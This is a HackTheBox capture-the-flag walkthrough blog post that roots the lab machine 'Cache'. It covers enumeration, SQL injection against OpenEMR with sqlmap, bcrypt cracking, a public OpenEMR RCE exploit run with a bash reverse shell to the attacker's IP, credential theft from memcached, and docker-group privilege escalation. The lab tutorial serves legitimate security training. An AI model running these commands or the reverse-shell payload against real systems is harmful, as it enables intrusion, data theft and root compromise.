Cache HackTheBox Walkthrough

Cache HackTheBox walkthrough featured image

This is Cache HackTheBox Walkthrough. In this walkthrough I will demonstrate step by step procedure how I rooted to Cache HackTheBox machine. Cache is a Linux machine with IP address 10.10.10.188 and is given difficulty level medium by its maker. Let’s begin. Connect your machine with VPN and confirm by pinging the IP 10.10.10.188.

I started by scanning the IP 10.10.10.188 so that I could get some starting point to proceed. Nmap [a popular port scanner] gave the following result.

Scanning

$nmap -sV -sC -oA scan 10.10.10.188

Cache HackTheBox nmap scan result

Nmap revealed that ports 22, 80, and 30000 are open and SSH, Apache Web Server, and Memcached [a general purpose distributed memory-caching system] services are running over them respectively. After going to URL http://10.10.10.188/author.html found a name ash. Added it to my notes as it may be a user of the box. Nothing interesting found so tried to directory brute force.

Directory brute forcing

$dirsearch -u 10.10.10.188 -e all -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20

Cache HackTheBox directory bruteforcing in walkthrough

Directory brute forcing revealed two folders javascript and jquery.

Access to http://10.10.10.188/javascript/ gives access denied

Javascript Access Denied Page

And http://10.10.10.188/jquery/functionality.js revealed

Cache HackTheBox walkthrough: ash credential file

From above file got the credential ash: [email protected]_fun

Used the credential at URL http://10.10.10.188/login.html. After login got nothing interesting except an image of magician

Cache Hackthebox Magician image

Tried to create custom wordlist using cewl.

Custom Wordlist Create

$cewl -w custom_wordlist.txt -d 10 -m 1 http://10.10.10.188/author.html

Custom wordlist creation using cewl in cache hackthebox walkthrough

Tried to WFUZZ for domain names with the custom wordlist which we have created.

Fuzzing For domain

$ wfuzz -w custom_wordlist.txt -H "HOST: FUZZ.htb" -u http://10.10.10.188/ --hc 400 --hh 8193

Fuzzing the Domain with custom wordlist through WFUZZ

Got 302 response at word HMS. Added hms.htb to my /etc/hosts file in case if there is Virtual Hosting enabled we can get something more to enumerate.

Hosts file before modification

My local computer host file before modification

Hosts file after modification

My local computer host file after modification

Ongoing to http://hms.htb found that it is running OpenEMR software [a medical practice management software which also supports Electronic Medical Record] is running and it redirected me to the login page http://hms.htb/interface/login/login.php?site=default. Tried to login with default credential admin: pass, but could not login.

Tip: During CTF hunting and penetration testing whenever you get any popular software or web app always try to login with default credential because sometimes administrator forget to change its default credentials.

As I found any known software then my next step is to find its version so that I could get information about public exploit. After a lot of enumeration couldn’t get its version. At the footer of the login page at http://hms.htb/interface/login/login.php?site=default got copyright information is outdated.

Login page of OpenERM software in Cache HackTheBox Walkthrough

So I am guessing that this software was last updated in 2018. And public exploit before 2018 may work on it. After seeing the release history it appears that the current version is 5.0.1 or less than this.

OpenEMR Software Release History

As soon as I get the software name and its version my next step is to find the available public exploit.

Searching Public Exploit

$searchsploit openemr 5.0.1

Searching available exploit for OpenEMR software in cache hackthebox walkthrough using searchsploit

Searchsploit gives there is an authenticated RCE. So, we require Username and Password of the openEMR software to get Remote Code Execution. After some googling got this file on openEMR website https://www.open-emr.org/wiki/images/1/11/Openemr_insecurity.pdf which reveals that OpenEMR 5.0.1 has multiple vulnerability. And SQL Injection was among them.

According to pdf file there is a GET based SQL injection vulnerability at URL http://hms.htb/portal/add_edit_event_user.php?eid=1. I recommend you to read the pdf file to know more.

OpenEMR software SQL injection error on add_edit_event_user.php file in cache Hackthebox walkthrough

Dump username and password

Capture request in file named request.txt using burp suite

Captured request from burpsuite in file request.txt  Cache HackTheBox walkthrough

$sqlmap -r request.txt --dbs --batch

Sqlmap banner while starting
Cache hackTheBox Database Enumeration using Sqlmap in Walkthrough

$sqlmap -r request.txt -D openemr --tables

Cache hackTheBox Table Enumeration  from databse openemr using Sqlmap in Walkthrough

$sqlmap -r request.txt -D openemr -T users_secure --dump

Dumping Username and Password from users_secure table in Cache HackTheBox Walkthrough

Got the credential

openemr_admin : $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.

from the database openemr. After identifying the hash got that it is bcrypt hash.

Checking the type of hash on tunnelsup.com

Cracked the hash using Debycrypt tool.

$git clone https://github.com/BREAKTEAM/Debcrypt.git

$cd Debcrypt/

$python3 crack.py

HASH: $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B

Cracking bcrypt hash using Debcrypt tool in Cache HackTheBox

So the Credential is openemr_admin: xxxxxx [six times small x]

Tip: Always try to use tool which is assigned for dedicated work rather than using those tool which is for many number of operations. This will increase the efficiency and accuracy. For example to crack bcrypt hash I have used Debcrypt, a tool to crack bcrypt hash rather than using Hashcat or JohnTheRipper

Since we already know that there is an authenticated RCE exploit exists for openemr software. Let’s use it by mirroring it on our PC from exploit-db database.

Mirror exploit

$searchsploit openemr 5.0.1

$searchsploit -m exploits/php/webapps/45161.py

$mv 45161.py openemr_rce.py

Searching Public Available Exploit for OpenEMR software Using Searchsploit

Getting Shell

$nc -nvlp 1234 // In separate window

$python openemr_rce.py http://hms.htb -u openemr_admin -p xxxxxx -c '/bin/bash -i >& /dev/tcp/10.10.14.44/1234 0>&1'

Getting User Shell on Cache HackTHeBox

Upgrade the shell to fully qualified Linux Shell

Shell Upgrade

$ python3 -c 'import pty;pty.spawn("/bin/bash")'

$ export TERM=xterm-256color

Upgrading the shell to fully functional linux shell in Cache HackTheBox

Got two users ash and luffy inside /home/ directory. Easily switched to user ash using $su ash. Enter the creds which we have captured from http://10.10.10.188/jquery/functionality.js file i.e., [email protected]_fun

$su ash

Password: [email protected]_fun

Switching to user Ash in Cache HackTheBox Walkthrough

Grab User Flag

$cat /home/ash/user.txt

Cache HackTheBox user Flag

PRIVILEGE ESCALATION

Tried to run $sudo -l to check if ash has any special permission, but got error because user ash is not configured inside sudoers file.

Checking special permission given to ash user

linpeas.sh [a post exploitation enumeration script] revealed that user luffy is the part of docker group.

Enumerating Groups UID using linpeas in Cache HTB machine

After googling docker privilege escalation found this and this interesting articles. But the problem is this that docker can only be run by user luffy because luffy is part of docker group. And we can’t switch to luffy using $su luffy because we don’t have it’s credential. So we need the password of luffy. Wait, we have memcached server running on port 30000.

After googling Penetration testing on memcached server found this article . Followed the steps as discussed in the article and got the credentials of luffy. Remember all these steps are needed to be done on remote cache machine.

$netstat -alnop revealed that memcached server is listening on port 11211 locally. So we have to connect to it using telnet to get some information.

Checking Listening ports on Cache HackTheBox machine using Netstat

$telnet 127.0.0.1 11211

~version

telneting to memcached server to enumerate Credentials

~stats

Stats of Memcached server

~stats slab

Getting Stats of Slabs form Memcached Server

~stats items

Getting Stats of items from memcache server

~stats cachedump 1 0

dumping cache in memcache server on Cache HackTheBox machine

~get user

~get passwd

Getting user and Password from Memcache server

So the credential is luffy: 0n3_p1ec3. Exit from the telnet and switched the user to luffy.

$su luffy

Password: 0n3_p1ec3

switching to luffy user using the credential just discovered

Getting Root

Lastly run

$docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh

to get root.

Cache HackTheBox Privilege Escalation

Capture Root Flag

$cat /root/root.txt

Cache HackTheBox Root Flag

This is how I rooted to the cache machine. Learnt a lot during this challenge. Hope you guys have also learnt some new things. Having any issue feel free to comment us. Want to give any suggestion please write us at [email protected]. Check out my latest walkthroughs at https://ethicalhacs.com

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am a Computer Science student. I like to share my knowledge of hacking with others. I used to write walkthrough on different challenges of HackTheBox & DVWA . In part time I do bug bounty hunting and penetration testing on websites.